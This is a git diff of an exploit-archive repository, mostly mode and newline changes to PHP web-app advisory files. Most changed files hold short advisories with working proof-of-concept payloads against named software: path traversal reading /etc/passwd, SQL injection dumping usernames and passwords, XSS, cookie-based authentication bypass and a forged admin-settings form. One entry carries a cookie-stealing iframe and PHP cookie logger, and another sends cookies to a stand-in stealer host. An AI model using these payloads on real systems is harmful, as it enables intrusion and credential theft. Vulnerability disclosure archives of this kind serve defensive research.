+http://www.example.com/conpresso407/_manual/index.php?ref=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/32759.txt b/platforms/php/webapps/32759.txt old mode 100755 new mode 100644 index 78e5a6df6..4b39f027b --- a/platforms/php/webapps/32759.txt +++ b/platforms/php/webapps/32759.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view files and execute local scrip OpenX 2.6.3 is affected; other versions may also be vulnerable. -http://www.example.com/www/delivery/fc.php?MAX_type= ../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/www/delivery/fc.php?MAX_type= ../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32760.txt b/platforms/php/webapps/32760.txt old mode 100755 new mode 100644 index 00dc5fb90..ee2900f86 --- a/platforms/php/webapps/32760.txt +++ b/platforms/php/webapps/32760.txt @@ -4,4 +4,4 @@ NewsCMSLite is prone to an authentication-bypass vulnerability because it fails Attackers can exploit this vulnerability to gain unauthorized access to the affected application, which may aid in further attacks. -javascript:document.cookie = "loggedIn=xY1zZoPQ; path=/" \ No newline at end of file +javascript:document.cookie = "loggedIn=xY1zZoPQ; path=/" \ No newline at end of file diff --git a/platforms/php/webapps/32766.txt b/platforms/php/webapps/32766.txt old mode 100755 new mode 100644 index b23993c5f..f373c49a1 --- a/platforms/php/webapps/32766.txt +++ b/platforms/php/webapps/32766.txt @@ -4,4 +4,4 @@ Autonomy Ultraseek is prone to a remote URI-redirection vulnerability because th A successful exploit may aid in phishing attacks. -http://www.example.com/cs.html?url=http://www.example2.com \ No newline at end of file +http://www.example.com/cs.html?url=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32767.txt b/platforms/php/webapps/32767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32770.txt b/platforms/php/webapps/32770.txt old mode 100755 new mode 100644 index 6929efe43..da9754b49 --- a/platforms/php/webapps/32770.txt +++ b/platforms/php/webapps/32770.txt @@ -5,4 +5,4 @@ E-Php B2B Trading Marketplace Script is prone to multiple cross-site scripting v An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/b2b/signin.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E -http://www.example.com/b2b/gen_confirm.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file +http://www.example.com/b2b/gen_confirm.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32773.txt b/platforms/php/webapps/32773.txt old mode 100755 new mode 100644 index 8f4d3f014..402f8bb03 --- a/platforms/php/webapps/32773.txt +++ b/platforms/php/webapps/32773.txt @@ -4,4 +4,4 @@ Simple Machines Forum is prone to an HTML-injection vulnerability because the ap Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. -[center][size=14pt][url=][/url][/size] [url=javascript:document.write('<iframe width="0%" height="0%" src="http://www.example.com/cookiestealer.php?cookie=' + document.cookie +'"> frameborder="0%">');][img]http://www.example2.com/intl/es_mx/images/logo.gif[/img][/center] PHP Cookie Stealer: <?php $cookie = $_GET['cookie']; $handler = fopen('cookies.txt', 'a'); fwrite($handler, $cookie."\n"); ?> [url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.example.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://www.example2.com/sample.png[/img][/center] \ No newline at end of file +[center][size=14pt][url=][/url][/size] [url=javascript:document.write('<iframe width="0%" height="0%" src="http://www.example.com/cookiestealer.php?cookie=' + document.cookie +'"> frameborder="0%">');][img]http://www.example2.com/intl/es_mx/images/logo.gif[/img][/center] PHP Cookie Stealer: <?php $cookie = $_GET['cookie']; $handler = fopen('cookies.txt', 'a'); fwrite($handler, $cookie."\n"); ?> [url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.example.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://www.example2.com/sample.png[/img][/center] \ No newline at end of file diff --git a/platforms/php/webapps/32777.html b/platforms/php/webapps/32777.html old mode 100755 new mode 100644 index 58f3d404e..9f3d78060 --- a/platforms/php/webapps/32777.html +++ b/platforms/php/webapps/32777.html @@ -6,4 +6,4 @@ Exploiting this issue may allow the attacker to compromise the application and t MetaBBS 0.11 is vulnerable; other versions may also be affected. -<form method="post" action="http://www.example.com/metabbs/admin/settings/?"> <dl> <dt><label for="settings_admin_password">Admin password</label></dt> <dd><input id="settings_admin_password" size="20" name="settings[admin_password]" value="" type="password" /></dd> <dt><label for="settings_global_header">Header file</label></dt> <dd><input id="settings_global_header" size="30" name="settings[global_header]" value="" type="text" /></dd> <dt><label for="settings_global_footer">Footer File</label></dt> <dd><input id="settings_global_footer" size="30" name="settings[global_footer]" value="" type="text" /></dd> <dt><label for="settings_theme">Site theme</label></dt> <dd><input id="settings_theme" size="30" name="settings[theme]" value="" type="text" /></dd> <dt><label for="settings_default_language">Language</label></dt> <dd> <dd><input id="ettings_default_language" size="30" name="settings[default_language]" value="" type="text" /></dd> <input name="settings[always_use_default_language]" value="0" type="hidden" /><input id="settings_always_use_default_language" name="settings[always_use_default_language]" value="1" type="checkbox" /> <label for="settings_always_use_default_language">Always Use Default Language</label> </dd> <dt><label for="settings_timezone">TimeZone</label></dt> <dd> <dd><input id="settings_timezone" size="30" name="settings[timezone]" value="" type="text" /></dd> </dl> <h2>Advanced Setting</h2> <p><input name="settings[force_fancy_url]" value="0" type="hidden" /> <input id="settings_force_fancy_url" name="settings[force_fancy_url]" value="1" type="checkbox" /> <label for="settings_force_fancy_url">Fancy URL Force Apply</label></p> <p><input type="submit" value="OK" /></p> </form> \ No newline at end of file +<form method="post" action="http://www.example.com/metabbs/admin/settings/?"> <dl> <dt><label for="settings_admin_password">Admin password</label></dt> <dd><input id="settings_admin_password" size="20" name="settings[admin_password]" value="" type="password" /></dd> <dt><label for="settings_global_header">Header file</label></dt> <dd><input id="settings_global_header" size="30" name="settings[global_header]" value="" type="text" /></dd> <dt><label for="settings_global_footer">Footer File</label></dt> <dd><input id="settings_global_footer" size="30" name="settings[global_footer]" value="" type="text" /></dd> <dt><label for="settings_theme">Site theme</label></dt> <dd><input id="settings_theme" size="30" name="settings[theme]" value="" type="text" /></dd> <dt><label for="settings_default_language">Language</label></dt> <dd> <dd><input id="ettings_default_language" size="30" name="settings[default_language]" value="" type="text" /></dd> <input name="settings[always_use_default_language]" value="0" type="hidden" /><input id="settings_always_use_default_language" name="settings[always_use_default_language]" value="1" type="checkbox" /> <label for="settings_always_use_default_language">Always Use Default Language</label> </dd> <dt><label for="settings_timezone">TimeZone</label></dt> <dd> <dd><input id="settings_timezone" size="30" name="settings[timezone]" value="" type="text" /></dd> </dl> <h2>Advanced Setting</h2> <p><input name="settings[force_fancy_url]" value="0" type="hidden" /> <input id="settings_force_fancy_url" name="settings[force_fancy_url]" value="1" type="checkbox" /> <label for="settings_force_fancy_url">Fancy URL Force Apply</label></p> <p><input type="submit" value="OK" /></p> </form> \ No newline at end of file diff --git a/platforms/php/webapps/32779.txt b/platforms/php/webapps/32779.txt old mode 100755 new mode 100644 index 8b9e73f70..a0cb9b468 --- a/platforms/php/webapps/32779.txt +++ b/platforms/php/webapps/32779.txt @@ -9,4 +9,4 @@ Ilch CMS 1.1L and prior versions are vulnerable. The following proof of concept X-Forward-For header is available: http://www.example.com', (select `pass` from prefix_user WHERE `id` > 0 -ORDER BY `id` LIMIT 1)) /* \ No newline at end of file +ORDER BY `id` LIMIT 1)) /* \ No newline at end of file diff --git a/platforms/php/webapps/3278.txt b/platforms/php/webapps/3278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32782.txt b/platforms/php/webapps/32782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32783.txt b/platforms/php/webapps/32783.txt old mode 100755 new mode 100644 index b85531cfe..4b2f39faa --- a/platforms/php/webapps/32783.txt +++ b/platforms/php/webapps/32783.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML and script code would execute in the context of the affec FotoWeb 6.0 is vulnerable; other versions may also be affected. http://www.example.com/fotoweb/Grid.fwx?&search=<script>alert("0wn3dâ?)</script> and (FQYFT -contains(JPEG)) \ No newline at end of file +contains(JPEG)) \ No newline at end of file diff --git a/platforms/php/webapps/32784.txt b/platforms/php/webapps/32784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32785.txt b/platforms/php/webapps/32785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32790.txt b/platforms/php/webapps/32790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32792.txt b/platforms/php/webapps/32792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3280.txt b/platforms/php/webapps/3280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32802.txt b/platforms/php/webapps/32802.txt old mode 100755 new mode 100644 index 4f37dc391..b31d5e853 --- a/platforms/php/webapps/32802.txt +++ b/platforms/php/webapps/32802.txt @@ -6,4 +6,4 @@ Exploiting the issue may allow an attacker to obtain sensitive information that ClipBucket 1.7 is vulnerable; other versions may also be affected. -http://www.example.com/dwnld.php?file=../../../../etc/passwd \ No newline at end of file +http://www.example.com/dwnld.php?file=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/32803.txt b/platforms/php/webapps/32803.txt old mode 100755 new mode 100644 index b06161308..1457c71bb --- a/platforms/php/webapps/32803.txt +++ b/platforms/php/webapps/32803.txt @@ -5,4 +5,4 @@ A4Desk Event Calendar is prone to an SQL-injection vulnerability because it fail Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[path]/admin/index.php?eventid=-1+union+all+select+1,concat_ws(version(),0x3a,database(),0x3a,user()),3,4,5,6-- \ No newline at end of file +http://www.example.com/[path]/admin/index.php?eventid=-1+union+all+select+1,concat_ws(version(),0x3a,database(),0x3a,user()),3,4,5,6-- \ No newline at end of file diff --git a/platforms/php/webapps/32804.txt b/platforms/php/webapps/32804.txt old mode 100755 new mode 100644 index 6307852e2..c19387c3e --- a/platforms/php/webapps/32804.txt +++ b/platforms/php/webapps/32804.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include arbitrary remote files containing This issue affects lastRSS autoposting bot MOD 0.1.3; other versions may also be vulnerable. -http://www.example.com/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code] \ No newline at end of file +http://www.example.com/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code] \ No newline at end of file diff --git a/platforms/php/webapps/32806.txt b/platforms/php/webapps/32806.txt old mode 100755 new mode 100644 index 225e03191..f11945e81 --- a/platforms/php/webapps/32806.txt +++ b/platforms/php/webapps/32806.txt @@ -4,4 +4,4 @@ Blue Utopia is prone to a local file-include vulnerability because it fails to p An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks. -http://www.example.com/index.php?page=../../../../../../../../../../../../../../.. /../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?page=../../../../../../../../../../../../../../.. /../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/32807.txt b/platforms/php/webapps/32807.txt old mode 100755 new mode 100644 index 5e8ee3bfc..21675ccb8 --- a/platforms/php/webapps/32807.txt +++ b/platforms/php/webapps/32807.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc gigCalendar 1.0 is vulnerable; other versions may also be affected. http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1' -UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23 \ No newline at end of file +UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23 \ No newline at end of file diff --git a/platforms/php/webapps/32808.txt b/platforms/php/webapps/32808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32809.txt b/platforms/php/webapps/32809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3281.txt b/platforms/php/webapps/3281.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32810.txt b/platforms/php/webapps/32810.txt old mode 100755 new mode 100644 index eea5c7a3e..f7184e26d --- a/platforms/php/webapps/32810.txt +++ b/platforms/php/webapps/32810.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would execute in the context of the affec Magento 1.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/downloader/?return=%22%3Cscript%3Ealert('xss')%3C/script%3E \ No newline at end of file +http://www.example.com/downloader/?return=%22%3Cscript%3Ealert('xss')%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32814.txt b/platforms/php/webapps/32814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32816.txt b/platforms/php/webapps/32816.txt old mode 100755 new mode 100644 index c9577d97f..547e51b93 --- a/platforms/php/webapps/32816.txt +++ b/platforms/php/webapps/32816.txt @@ -4,4 +4,4 @@ Orooj CMS is prone to an SQL-injection vulnerability because it fails to suffici Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/news.php?nid=-1+union+select+1,2,3,4,5,concat(sm_username,char(58),sm_password),7,8,9+from+tbl_site_member \ No newline at end of file +http://www.example.com/news.php?nid=-1+union+select+1,2,3,4,5,concat(sm_username,char(58),sm_password),7,8,9+from+tbl_site_member \ No newline at end of file diff --git a/platforms/php/webapps/32819.txt b/platforms/php/webapps/32819.txt old mode 100755 new mode 100644 index 045371a07..b60402ca1 --- a/platforms/php/webapps/32819.txt +++ b/platforms/php/webapps/32819.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Parsi PHP CMS 2.0.0 is vulnerable; other versions may also be affected. http://www.example.com/[p4th]/index.php?Cat=-9999'+union+select+1,2,3,concat(user_username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+parsiphp_u -ser/* \ No newline at end of file +ser/* \ No newline at end of file diff --git a/platforms/php/webapps/32823.txt b/platforms/php/webapps/32823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32827.txt b/platforms/php/webapps/32827.txt old mode 100755 new mode 100644 index d4416fdfb..a35be9085 --- a/platforms/php/webapps/32827.txt +++ b/platforms/php/webapps/32827.txt @@ -4,4 +4,4 @@ Afian is prone to a directory-traversal vulnerability because it fails to suffic Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. -http://www.example.com/path/css/includer.php?files=PATH_TO_FILES \ No newline at end of file +http://www.example.com/path/css/includer.php?files=PATH_TO_FILES \ No newline at end of file diff --git a/platforms/php/webapps/32828.txt b/platforms/php/webapps/32828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3283.txt b/platforms/php/webapps/3283.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32830.txt b/platforms/php/webapps/32830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32831.txt b/platforms/php/webapps/32831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32835.txt b/platforms/php/webapps/32835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3284.txt b/platforms/php/webapps/3284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32840.txt b/platforms/php/webapps/32840.txt old mode 100755 new mode 100644 index 9e37160ed..29754c140 --- a/platforms/php/webapps/32840.txt +++ b/platforms/php/webapps/32840.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://www.example.com/[Path]/modir Username:admin -Password: ' or ' \ No newline at end of file +Password: ' or ' \ No newline at end of file diff --git a/platforms/php/webapps/32841.txt b/platforms/php/webapps/32841.txt old mode 100755 new mode 100644 index 08c594402..a7fec09a8 --- a/platforms/php/webapps/32841.txt +++ b/platforms/php/webapps/32841.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc CMSCart 1.04 is vulnerable; other versions may also be affected. -http://www.example.com/cmscart/index.php?MenuLevel1=%27 \ No newline at end of file +http://www.example.com/cmscart/index.php?MenuLevel1=%27 \ No newline at end of file diff --git a/platforms/php/webapps/32842.txt b/platforms/php/webapps/32842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32843.txt b/platforms/php/webapps/32843.txt old mode 100755 new mode 100644 index a24cf4653..c5cb2adfa --- a/platforms/php/webapps/32843.txt +++ b/platforms/php/webapps/32843.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Versions prior to TinX CMS 3.5.1 are vulnerable. -http://www.example.com/system/rss.php?id=1'SQL-code \ No newline at end of file +http://www.example.com/system/rss.php?id=1'SQL-code \ No newline at end of file diff --git a/platforms/php/webapps/32844.txt b/platforms/php/webapps/32844.txt old mode 100755 new mode 100644 index b2af7f308..7a0b3563d --- a/platforms/php/webapps/32844.txt +++ b/platforms/php/webapps/32844.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect PHORTAIL 1.2.1 is vulnerable; other versions may also be affected. -<html><head><title>PHORTAIL v1.2.1 XSS Vulnerability</title></head> <hr><pre> Module : PHORTAIL 1.2.1 download : http://www.phpscripts-fr.net/scripts/download.php?id=330 Vul : XSS Vulnerability file : poster.php Author : Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org </pre><hr> <form name="rapporter" action="http://www.example.com/poster.php" method="POST"></br> <input type="hidden" name="ajn" value="1"> <input type="text" name="pseudo" value="xss">=>Pseudo</br> <input type="text" name="email" value="xss@xss.com">=>E-mail</br> <input type="text" name="ti" value="<script>alert('xss PoC');</script>">=>XSS vulnerability</br> <input type="text" name="txt" value="xss">=>text</br> <input type="submit" value="Start"></br> </form> </html> \ No newline at end of file +<html><head><title>PHORTAIL v1.2.1 XSS Vulnerability</title></head> <hr><pre> Module : PHORTAIL 1.2.1 download : http://www.phpscripts-fr.net/scripts/download.php?id=330 Vul : XSS Vulnerability file : poster.php Author : Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org </pre><hr> <form name="rapporter" action="http://www.example.com/poster.php" method="POST"></br> <input type="hidden" name="ajn" value="1"> <input type="text" name="pseudo" value="xss">=>Pseudo</br> <input type="text" name="email" value="xss@xss.com">=>E-mail</br> <input type="text" name="ti" value="<script>alert('xss PoC');</script>">=>XSS vulnerability</br> <input type="text" name="txt" value="xss">=>text</br> <input type="submit" value="Start"></br> </form> </html> \ No newline at end of file diff --git a/platforms/php/webapps/32846.txt b/platforms/php/webapps/32846.txt old mode 100755 new mode 100644 index b84e17b09..8e93d60ed --- a/platforms/php/webapps/32846.txt +++ b/platforms/php/webapps/32846.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Nenriki CMS 0.5 is vulnerable; other versions may also be affected. javascript:document.cookie ="password=1; path=/" then -javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/" \ No newline at end of file +javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/" \ No newline at end of file diff --git a/platforms/php/webapps/3285.htm b/platforms/php/webapps/3285.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32852.txt b/platforms/php/webapps/32852.txt old mode 100755 new mode 100644 index 3ba8427e8..095e291e2 --- a/platforms/php/webapps/32852.txt +++ b/platforms/php/webapps/32852.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TikiWiki 2.2 through 3.0 beta1 are vulnerable. -http://www.example.com/tiki-galleries.php/>"><Script>alert(1)</scRipt> \ No newline at end of file +http://www.example.com/tiki-galleries.php/>"><Script>alert(1)</scRipt> \ No newline at end of file diff --git a/platforms/php/webapps/32853.txt b/platforms/php/webapps/32853.txt old mode 100755 new mode 100644 index 5190a760f..0eb6d5229 --- a/platforms/php/webapps/32853.txt +++ b/platforms/php/webapps/32853.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TikiWiki 2.2 through 3.0 beta1 are vulnerable. -http://www.example.com/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt> \ No newline at end of file +http://www.example.com/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt> \ No newline at end of file diff --git a/platforms/php/webapps/32854.txt b/platforms/php/webapps/32854.txt old mode 100755 new mode 100644 index 2cd18a88e..2a207445b --- a/platforms/php/webapps/32854.txt +++ b/platforms/php/webapps/32854.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TikiWiki 2.2 through 3.0 beta1 are vulnerable. -http://www.example.com/tiki-listpages.php/>"><Script>alert(3)</scRipt> \ No newline at end of file +http://www.example.com/tiki-listpages.php/>"><Script>alert(3)</scRipt> \ No newline at end of file diff --git a/platforms/php/webapps/3286.asp b/platforms/php/webapps/3286.asp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32861.txt b/platforms/php/webapps/32861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32867.txt b/platforms/php/webapps/32867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32868.txt b/platforms/php/webapps/32868.txt old mode 100755 new mode 100644 index 34b18aa4b..8154aa7b0 --- a/platforms/php/webapps/32868.txt +++ b/platforms/php/webapps/32868.txt @@ -53,5 +53,4 @@ Discovered by dxw: ================ Tom Adams >>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464 -Please visit security.dxw.com for more information. - \ No newline at end of file +Please visit security.dxw.com for more information. \ No newline at end of file diff --git a/platforms/php/webapps/3287.asp b/platforms/php/webapps/3287.asp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32871.txt b/platforms/php/webapps/32871.txt old mode 100755 new mode 100644 index 9a51d76f7..18dd1e404 --- a/platforms/php/webapps/32871.txt +++ b/platforms/php/webapps/32871.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would run in the context of the affected ExpressionEngine 1.6.4 through 1.6.6 are affected. Other versions may also be vulnerable. -chococat.gif"><script>alert('XSS')</script><div "a \ No newline at end of file +chococat.gif"><script>alert('XSS')</script><div "a \ No newline at end of file diff --git a/platforms/php/webapps/32872.txt b/platforms/php/webapps/32872.txt old mode 100755 new mode 100644 index e7fa4fbd2..8addc99c7 --- a/platforms/php/webapps/32872.txt +++ b/platforms/php/webapps/32872.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc PHPizabi 0.848b C1 HFP1 is vulnerable; other versions may also be affected. -http://www.example.com/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/* \ No newline at end of file +http://www.example.com/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/* \ No newline at end of file diff --git a/platforms/php/webapps/32873.txt b/platforms/php/webapps/32873.txt old mode 100755 new mode 100644 index 8898a8443..7d7717a41 --- a/platforms/php/webapps/32873.txt +++ b/platforms/php/webapps/32873.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Versions prior to PHPCMS2008 2009.03.17 are vulnerable. -http://www.example.com/ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23 \ No newline at end of file +http://www.example.com/ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23 \ No newline at end of file diff --git a/platforms/php/webapps/32875.txt b/platforms/php/webapps/32875.txt old mode 100755 new mode 100644 index ed92cdebf..475d082cf --- a/platforms/php/webapps/32875.txt +++ b/platforms/php/webapps/32875.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Comparison Engine Power 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/comparisonengine/product.comparision.php?cat=null union all select 1,concat_ws(0x3a,id,email,password,nickname),3,4,5 from daype_users_tb--&name=GSM \ No newline at end of file +http://www.example.com/comparisonengine/product.comparision.php?cat=null union all select 1,concat_ws(0x3a,id,email,password,nickname),3,4,5 from daype_users_tb--&name=GSM \ No newline at end of file diff --git a/platforms/php/webapps/3288.asp b/platforms/php/webapps/3288.asp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32880.txt b/platforms/php/webapps/32880.txt old mode 100755 new mode 100644 index c85f482d4..faf546918 --- a/platforms/php/webapps/32880.txt +++ b/platforms/php/webapps/32880.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Turnkey eBook Store 1.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?cmd=search&keywords="><script>alert('XSS')</script> -http://www.example.com/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http://www.example2.net"> \ No newline at end of file +http://www.example.com/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http://www.example2.net"> \ No newline at end of file diff --git a/platforms/php/webapps/32887.txt b/platforms/php/webapps/32887.txt old mode 100755 new mode 100644 index 5cf04f4a8..e773e0caa --- a/platforms/php/webapps/32887.txt +++ b/platforms/php/webapps/32887.txt @@ -11,4 +11,4 @@ osCommerce 3.0 Beta Other versions may also be affected. -http://www.example.com/myapp/index.php?oscid=arbitrarysession \ No newline at end of file +http://www.example.com/myapp/index.php?oscid=arbitrarysession \ No newline at end of file diff --git a/platforms/php/webapps/32889.txt b/platforms/php/webapps/32889.txt old mode 100755 new mode 100644 index a7003b693..c65a6b9a1 --- a/platforms/php/webapps/32889.txt +++ b/platforms/php/webapps/32889.txt @@ -8,4 +8,4 @@ The attacker can exploit the local file-include issue to execute arbitrary local http://www.example.com/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users-- http://www.example.com/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users-- -http://www.example.com/frontend/index.php?chlang=../../../../etc/services%00 \ No newline at end of file +http://www.example.com/frontend/index.php?chlang=../../../../etc/services%00 \ No newline at end of file diff --git a/platforms/php/webapps/32910.txt b/platforms/php/webapps/32910.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32911.txt b/platforms/php/webapps/32911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32912.txt b/platforms/php/webapps/32912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32913.txt b/platforms/php/webapps/32913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32914.php b/platforms/php/webapps/32914.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3292.txt b/platforms/php/webapps/3292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32924.txt b/platforms/php/webapps/32924.txt old mode 100755 new mode 100644 index a5dcc2da4..0f972b281 --- a/platforms/php/webapps/32924.txt +++ b/platforms/php/webapps/32924.txt @@ -10,4 +10,4 @@ http://www.example.com/cms/admin/?action=edit&slab=home&#039;><script>alert(&#03 http://www.example.com/cms/admin/?action=showcats&unpub=true&slabID=1&catname=sidebar&#039;><script>alert(&#039;http://yourcookiestealer.org/evil.php?cookie=&#039;%20+%20encodeURI(document.cookie)%20+%20&#039;&useragent=&#039;%20+%20encodeURI(navigator.userAgent));</script><form -http://www.example.com/cms/admin/?action=reordercat&cat=sidebar&#039;><script>alert(&#039;http://yourcookiestealer.org/evil.php?cookie=&#039;%20+%20encodeURI(document.cookie)%20+%20&#039;&useragent=&#039;%20+%20encodeURI(navigator.userAgent));</script><form&param=0,1 \ No newline at end of file +http://www.example.com/cms/admin/?action=reordercat&cat=sidebar&#039;><script>alert(&#039;http://yourcookiestealer.org/evil.php?cookie=&#039;%20+%20encodeURI(document.cookie)%20+%20&#039;&useragent=&#039;%20+%20encodeURI(navigator.userAgent));</script><form&param=0,1 \ No newline at end of file diff --git a/platforms/php/webapps/32928.txt b/platforms/php/webapps/32928.txt old mode 100755 new mode 100644 index 77c84d759..55f557e39 --- a/platforms/php/webapps/32928.txt +++ b/platforms/php/webapps/32928.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view and execute arbitrary local f Malleo 1.2.3 is vulnerable; other versions may also be affected. -http://www.example.com/path/admin.php?module=../../../../../etc/passwd \ No newline at end of file +http://www.example.com/path/admin.php?module=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/32930.txt b/platforms/php/webapps/32930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32932.txt b/platforms/php/webapps/32932.txt old mode 100755 new mode 100644 index 5e9adb65e..922571ce2 --- a/platforms/php/webapps/32932.txt +++ b/platforms/php/webapps/32932.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Online Photo Pro 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?section=<script>alert(123)</script> \ No newline at end of file +http://www.example.com/index.php?section=<script>alert(123)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32933.txt b/platforms/php/webapps/32933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32934.txt b/platforms/php/webapps/32934.txt old mode 100755 new mode 100644 diff --git 